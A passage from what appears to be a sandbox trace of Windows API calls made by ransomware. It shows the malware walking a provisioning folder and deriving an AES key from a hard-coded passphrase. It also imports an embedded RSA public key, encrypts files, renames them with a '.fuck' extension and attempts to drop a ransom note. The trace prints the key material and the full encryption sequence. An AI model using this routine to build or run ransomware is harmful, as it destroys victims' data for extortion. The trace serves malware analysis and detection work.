(lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0237.252] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0237.253] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0237.253] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0237.253] CryptDestroyHash (hHash=0x2817858) returned 1 [0237.253] CryptDestroyKey (hKey=0x2817a18) returned 1 [0237.253] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.253] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.254] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.254] GetLastError () returned 0x5 [0237.254] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0237.254] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0237.254] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.255] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.255] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.255] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2832f28) returned 1 [0237.260] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.260] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.260] CryptHashData (hHash=0x2817858, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.261] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x2817858, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2817a18) returned 1 [0237.261] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.261] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.261] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2833720) returned 1 [0237.263] CryptImportPublicKeyInfo (in: hCryptProv=0x2833720, dwCertEncodingType=0x1, pInfo=0x283b708*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283b738*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283b740*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2817c18) returned 1 [0237.263] CryptEncrypt (in: hKey=0x2817c18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.263] CryptEncrypt (in: hKey=0x2817c18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28342d0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28342d0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.263] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28342d0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.263] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277daf8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.263] CryptEncrypt (in: hKey=0x2817a18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277daf8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x277daf8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.263] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.263] CloseHandle (hObject=0xffffffff) returned 1 [0237.263] CloseHandle (hObject=0xffffffff) returned 1 [0237.263] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0237.264] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0237.264] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0237.264] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0237.265] CryptDestroyHash (hHash=0x2817858) returned 1 [0237.265] CryptDestroyKey (hKey=0x2817a18) returned 1 [0237.265] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.265] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.265] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.265] GetLastError () returned 0x5 [0237.265] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml")) returned 0x20 [0237.265] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml", dwFileAttributes=0x80) returned 0 [0237.266] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.266] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.266] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.266] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2832f28) returned 1 [0237.271] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.271] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.272] CryptHashData (hHash=0x2817b58, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.272] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x2817b58, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2817858) returned 1 [0237.272] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.272] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.272] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2834358) returned 1 [0237.273] CryptImportPublicKeyInfo (in: hCryptProv=0x2834358, dwCertEncodingType=0x1, pInfo=0x283aad8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283ab08*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283ab10*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28174d8) returned 1 [0237.274] CryptEncrypt (in: hKey=0x28174d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.274] CryptEncrypt (in: hKey=0x28174d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28343e0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28343e0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.274] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28343e0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.274] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277daf8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.274] CryptEncrypt (in: hKey=0x2817858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277daf8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x277daf8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.274] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.274] CloseHandle (hObject=0xffffffff) returned 1 [0237.274] CloseHandle (hObject=0xffffffff) returned 1 [0237.274] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml"), bFailIfExists=0) returned 0 [0237.275] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml", dwFileAttributes=0x0) returned 0 [0237.275] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml.gsg")) returned 0 [0237.275] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml.fuck")) returned 0 [0237.276] CryptDestroyHash (hHash=0x2817b58) returned 1 [0237.276] CryptDestroyKey (hKey=0x2817858) returned 1 [0237.276] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.276] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0237.276] FindClose (in: hFindFile=0x2817458 | out: hFindFile=0x2817458) returned 1 [0237.276] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0237.276] AreFileApisANSI () returned 1 [0237.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2832f28, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0237.276] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.276] GetLastError () returned 0x5 [0237.276] GetLastError () returned 0x5 [0237.277] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.277] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0237.279] GetLastError () returned 0x5 [0237.279] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml")) returned 0x20 [0237.280] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0237.280] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.280] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.280] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.281] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2832f28) returned 1 [0237.286] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0237.286] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.286] CryptHashData (hHash=0x2817458, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.286] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x2817458, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817a18) returned 1 [0237.286] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.286] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0237.286] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2833610) returned 1 [0237.288] CryptImportPublicKeyInfo (in: hCryptProv=0x2833610, dwCertEncodingType=0x1, pInfo=0x283b2f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283b328*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283b330*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817b58) returned 1 [0237.288] CryptEncrypt (in: hKey=0x2817b58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0237.288] CryptEncrypt (in: hKey=0x2817b58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2833c70*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2833c70*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0237.288] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2833c70, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.288] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279b788, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279b788, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0237.288] CryptEncrypt (in: hKey=0x2817a18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279b788*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279b788*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0237.288] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279b788, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.288] CloseHandle (hObject=0xffffffff) returned 1 [0237.288] CloseHandle (hObject=0xffffffff) returned 1 [0237.288] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0237.289] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0237.289] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml.gsg")) returned 0 [0237.289] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml.fuck")) returned 0 [0237.289] CryptDestroyHash 